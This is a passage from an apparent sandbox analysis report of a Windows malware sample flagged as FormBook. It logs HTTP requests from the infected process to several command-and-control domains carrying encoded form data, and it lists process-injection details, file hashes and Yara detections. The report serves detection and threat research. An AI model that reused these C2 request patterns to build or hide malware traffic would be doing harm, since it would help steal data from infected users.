                                                                  16192.168.2.45001984.32.84.32801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:19:56.180372000 CEST446OUTGET /pt4m/?nrs8j=AzKTe9sU/un6FWh8J4Z/TBPHes/wm2VwkqZ8OIQkGxADXwK45dBXsHOALtRz338sDHJ9qmiySJX4ofZpl75YgKir24cXfpRpIxKZjJwadTshiHDArMKxe74=&Yp=eXMH4fkp HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.thepeatear.online
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Oct 8, 2024 14:19:56.641262054 CEST1236INHTTP/1.1 200 OK
                                                                  Server: hcdn
                                                                  Date: Tue, 08 Oct 2024 12:19:56 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 10072
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  x-hcdn-request-id: 37d6ba98a8476778d23f4616ee078109-bos-edge4
                                                                  Expires: Tue, 08 Oct 2024 12:19:55 GMT
                                                                  Cache-Control: no-cache
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                  Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                  Oct 8, 2024 14:19:56.641294003 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                  Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                  Oct 8, 2024 14:19:56.641304016 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                  Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                  Oct 8, 2024 14:19:56.641315937 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                  Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                  Oct 8, 2024 14:19:56.641328096 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                  Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                  Oct 8, 2024 14:19:56.641339064 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                  Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                  Oct 8, 2024 14:19:56.641350031 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                  Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                  Oct 8, 2024 14:19:56.641935110 CEST1000INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                                  Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                                  Oct 8, 2024 14:19:56.641944885 CEST760INData Raw: 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f
                                                                  Data Ascii: d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.4500203.33.130.190801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:20:17.854618073 CEST727OUTPOST /oigd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.crowsecurity.cloud
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.crowsecurity.cloud
                                                                  Referer: http://www.crowsecurity.cloud/oigd/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 44 6b 4e 44 47 69 74 36 52 59 72 57 63 7a 73 73 4e 4c 35 41 67 4e 59 30 46 4b 2f 39 4e 6d 30 38 70 7a 6b 49 4f 38 64 75 55 4b 53 33 50 6f 61 6b 2f 78 6a 35 35 76 79 6c 4e 52 4e 73 55 44 53 64 46 76 35 76 75 31 39 57 67 47 76 46 49 75 44 68 30 59 6f 32 70 73 31 49 4a 69 58 35 53 32 63 36 4d 42 64 41 68 4f 52 35 41 35 61 50 43 68 38 70 36 76 71 38 73 51 61 65 38 54 35 67 4b 71 6f 38 39 49 2f 4d 6b 4f 48 54 35 53 56 6a 30 4b 51 30 4c 32 42 58 72 48 4c 79 46 33 75 63 43 75 44 66 57 78 4f 51 56 48 56 47 33 4a 53 73 76 74 6b 6a 64 77 39 35 52 6a 79 5a 55 56 79 2f 70 6f 53 35 34 67 3d 3d
                                                                  Data Ascii: nrs8j=DkNDGit6RYrWczssNL5AgNY0FK/9Nm08pzkIO8duUKS3Poak/xj55vylNRNsUDSdFv5vu19WgGvFIuDh0Yo2ps1IJiX5S2c6MBdAhOR5A5aPCh8p6vq8sQae8T5gKqo89I/MkOHT5SVj0KQ0L2BXrHLyF3ucCuDfWxOQVHVG3JSsvtkjdw95RjyZUVy/poS54g==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.4500213.33.130.190801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:20:20.592905045 CEST747OUTPOST /oigd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.crowsecurity.cloud
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 222
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.crowsecurity.cloud
                                                                  Referer: http://www.crowsecurity.cloud/oigd/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 44 6b 4e 44 47 69 74 36 52 59 72 57 4f 44 63 73 4f 73 56 41 78 64 59 33 5a 36 2f 39 44 32 30 77 70 7a 6f 49 4f 39 5a 41 56 2f 36 33 4d 4a 71 6b 74 30 58 35 2b 76 79 6c 44 78 4e 54 51 44 54 52 46 76 30 50 75 30 74 57 67 47 72 46 49 73 4c 68 31 76 45 78 71 63 31 4b 41 43 58 2f 4e 6d 63 36 4d 42 64 41 68 4f 31 54 41 35 43 50 43 78 4d 70 35 4c 2b 37 79 67 61 5a 37 54 35 67 63 61 6f 34 39 49 2f 2b 6b 4e 44 31 35 55 5a 6a 30 4c 67 30 49 69 31 55 78 58 4b 35 61 6e 76 4f 4d 72 7a 61 59 54 6e 39 61 6c 4e 46 2b 70 57 2b 6e 4c 31 35 4d 42 63 75 44 6a 57 71 4a 53 37 4c 6b 72 76 77 6a 71 53 39 45 78 45 79 66 2b 6a 31 54 37 45 50 41 6d 42 41 66 39 59 3d
                                                                  Data Ascii: nrs8j=DkNDGit6RYrWODcsOsVAxdY3Z6/9D20wpzoIO9ZAV/63MJqkt0X5+vylDxNTQDTRFv0Pu0tWgGrFIsLh1vExqc1KACX/Nmc6MBdAhO1TA5CPCxMp5L+7ygaZ7T5gcao49I/+kND15UZj0Lg0Ii1UxXK5anvOMrzaYTn9alNF+pW+nL15MBcuDjWqJS7LkrvwjqS9ExEyf+j1T7EPAmBAf9Y=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.4500223.33.130.190801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:20:23.475444078 CEST10829OUTPOST /oigd/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.crowsecurity.cloud
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 10302
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.crowsecurity.cloud
                                                                  Referer: http://www.crowsecurity.cloud/oigd/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 44 6b 4e 44 47 69 74 36 52 59 72 57 4f 44 63 73 4f 73 56 41 78 64 59 33 5a 36 2f 39 44 32 30 77 70 7a 6f 49 4f 39 5a 41 56 35 69 33 4d 37 53 6b 75 58 2f 35 2f 76 79 6c 64 68 4e 53 51 44 53 4c 46 76 73 51 75 30 68 73 67 45 6a 46 49 4a 66 68 79 65 45 78 78 4d 31 4b 43 43 58 36 53 32 63 76 4d 42 74 4d 68 4f 6c 54 41 35 43 50 43 7a 55 70 74 50 71 37 77 67 61 65 38 54 35 30 4b 71 70 66 39 49 6e 75 6b 4f 76 44 36 6b 35 6a 30 6f 49 30 48 33 42 55 70 48 4b 37 62 6e 75 4c 4d 72 32 4b 59 54 37 66 61 6b 34 67 2b 72 4b 2b 6a 75 51 6a 63 55 38 58 42 46 4c 31 63 51 50 70 6a 4a 4c 75 71 35 57 35 4a 43 51 64 46 39 65 57 56 70 4a 32 52 6e 74 35 42 6f 6b 33 52 4e 54 38 47 51 49 43 43 6d 76 64 45 69 2b 39 54 30 78 31 5a 4e 34 50 6e 64 57 76 7a 4c 7a 31 46 64 56 43 47 37 47 6e 73 64 68 2b 59 37 55 62 59 2b 6f 32 47 34 62 75 54 71 66 31 4d 46 78 75 61 6a 47 56 55 50 4b 61 5a 59 33 62 30 38 54 71 67 36 53 4f 75 6c 46 49 68 56 69 71 71 36 53 51 2f 6a 4b 65 6f 2f 77 34 33 72 5a 6f 55 6c 41 41 45 76 55 49 [TRUNCATED]
                                                                  Data Ascii: nrs8j=DkNDGit6RYrWODcsOsVAxdY3Z6/9D20wpzoIO9ZAV5i3M7SkuX/5/vyldhNSQDSLFvsQu0hsgEjFIJfhyeExxM1KCCX6S2cvMBtMhOlTA5CPCzUptPq7wgae8T50Kqpf9InukOvD6k5j0oI0H3BUpHK7bnuLMr2KYT7fak4g+rK+juQjcU8XBFL1cQPpjJLuq5W5JCQdF9eWVpJ2Rnt5Bok3RNT8GQICCmvdEi+9T0x1ZN4PndWvzLz1FdVCG7Gnsdh+Y7UbY+o2G4buTqf1MFxuajGVUPKaZY3b08Tqg6SOulFIhViqq6SQ/jKeo/w43rZoUlAAEvUI/ew9IALKAVEETxXpgmBS1EeFeA9Dm7wKIgKRNdVo30AkOnj2xh85AUkJKnTaef+ufmgnMYdIQxQDTpdPCF6/H2/57g8yjq/2YpFchnFElQFe5h8++IFR4fUSU7Y9zfzqYu0p4zDdHD1nF9Sts3g6UgDkBmBbWdVY0Bba8ihm718W+HMKxapPZnGdI8jAKn8OXAje3XFHyjd+Hv2vCjaWtNetduScGoQOlqFPhk9pwbqGm18ed+iLuHpTqpsye1lUp2Qevk2GwOuQx4GeQkMvT17H/wuEEmp7cOKZ+pXOngcWDrkzBewXGK+U1SsclZ7UzEw40dYCBLGmYS3qdFWTDyg7Y+swxE17etcwXHBDX0pM7Wbad/ooB3Q0M8J4woILlGoJ2Qi+WN/utg6r7WM8zquF1DVFK5eHy/gR2eUg42+N3zImICpJtoqjUN5WUaaYOk0Q5wMI0vCAtS991sORxvmaX1VjNAZuYu05w2ELoUDQ9H7OG2CnchNBd/QBMCta9dNMeKgxbT45pK066kTJys0OPKmdxjOuVwiPUbX5ubinqF9yH7Lz7RsnAuxWiXiA1r/V9hgBHblbLV69ZShAhE2BZ/mYL8CsHQPFVKi+upNbaxfDEKQz0tKFNWFIOO9AY73UIm81PRwHgHYD/RLJV0ywvavXdYzEOY [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.4500233.33.130.190801228C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:20:26.021681070 CEST447OUTGET /oigd/?Yp=eXMH4fkp&nrs8j=OmljFUtRbeDOfRENDbVJh6NUYYaJHl1k9TsJZM5Ee42aF5vB50jMxPr4FwwBeRCvDsFug2RQoELqNPfysYsF+OkFJw//SD8mDkg+57R+QpypShxcm6mm+yI= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Host: www.crowsecurity.cloud
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Oct 8, 2024 14:20:26.592878103 CEST393INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Tue, 08 Oct 2024 12:20:26 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 253
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 70 3d 65 58 4d 48 34 66 6b 70 26 6e 72 73 38 6a 3d 4f 6d 6c 6a 46 55 74 52 62 65 44 4f 66 52 45 4e 44 62 56 4a 68 36 4e 55 59 59 61 4a 48 6c 31 6b 39 54 73 4a 5a 4d 35 45 65 34 32 61 46 35 76 42 35 30 6a 4d 78 50 72 34 46 77 77 42 65 52 43 76 44 73 46 75 67 32 52 51 6f 45 4c 71 4e 50 66 79 73 59 73 46 2b 4f 6b 46 4a 77 2f 2f 53 44 38 6d 44 6b 67 2b 35 37 52 2b 51 70 79 70 53 68 78 63 6d 36 6d 6d 2b 79 49 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yp=eXMH4fkp&nrs8j=OmljFUtRbeDOfRENDbVJh6NUYYaJHl1k9TsJZM5Ee42aF5vB50jMxPr4FwwBeRCvDsFug2RQoELqNPfysYsF+OkFJw//SD8mDkg+57R+QpypShxcm6mm+yI="}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  21192.168.2.4500243.33.130.19080
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 8, 2024 14:20:32.172312975 CEST730OUTPOST /tlbx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US,en
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.myjiorooms.services
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 202
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.myjiorooms.services
                                                                  Referer: http://www.myjiorooms.services/tlbx/
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.43 Safari/537.36 Vivaldi/1.0.252.3
                                                                  Data Raw: 6e 72 73 38 6a 3d 64 57 79 30 38 4b 36 6e 33 51 56 6a 76 4e 63 62 49 63 43 73 75 49 41 75 50 6f 65 41 36 62 2f 5a 4d 62 70 34 6b 34 76 70 78 64 4e 72 2b 65 73 63 67 62 5a 49 6e 53 53 55 62 68 4c 42 4c 56 35 35 35 2f 33 2b 43 62 2f 39 6d 6b 76 6a 39 35 5a 77 75 4e 72 77 78 57 54 45 33 7a 74 69 6d 2b 76 37 61 78 35 34 75 55 39 48 6e 76 42 30 58 44 41 47 63 4a 72 57 57 6e 42 6f 72 6f 67 35 73 52 64 75 43 41 4b 61 76 74 45 61 4b 76 36 35 4a 74 33 2f 32 45 44 35 68 6c 2f 63 6f 7a 32 46 33 34 47 74 48 49 6c 6d 54 53 63 66 2b 72 30 53 79 71 75 52 53 4e 68 31 70 6e 5a 38 69 33 7a 2f 41 4b 34 35 53 77 3d 3d
                                                                  Data Ascii: nrs8j=dWy08K6n3QVjvNcbIcCsuIAuPoeA6b/ZMbp4k4vpxdNr+escgbZInSSUbhLBLV555/3+Cb/9mkvj95ZwuNrwxWTE3ztim+v7ax54uU9HnvB0XDAGcJrWWnBorog5sRduCAKavtEaKv65Jt3/2ED5hl/coz2F34GtHIlmTScf+r0SyquRSNh1pnZ8i3z/AK45Sw==


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:08:17:24
                                                                  Start date:08/10/2024
                                                                  Path:C:\Users\user\Desktop\8mmZ7Bkoj1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'366'295 bytes
                                                                  MD5 hash:CCE5D60668494A747CA41F5D8B17E76A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:08:17:30
                                                                  Start date:08/10/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\8mmZ7Bkoj1.exe"
                                                                  Imagebase:0x190000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2155548191.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:08:17:59
                                                                  Start date:08/10/2024
                                                                  Path:C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe"
                                                                  Imagebase:0xbb0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:6
                                                                  Start time:08:18:01
                                                                  Start date:08/10/2024
                                                                  Path:C:\Windows\SysWOW64\makecab.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\makecab.exe"
                                                                  Imagebase:0x2c0000
                                                                  File size:68'096 bytes
                                                                  MD5 hash:00824484BE0BCE2A430D7F43CD9BABA5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3561632009.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:08:18:16
                                                                  Start date:08/10/2024
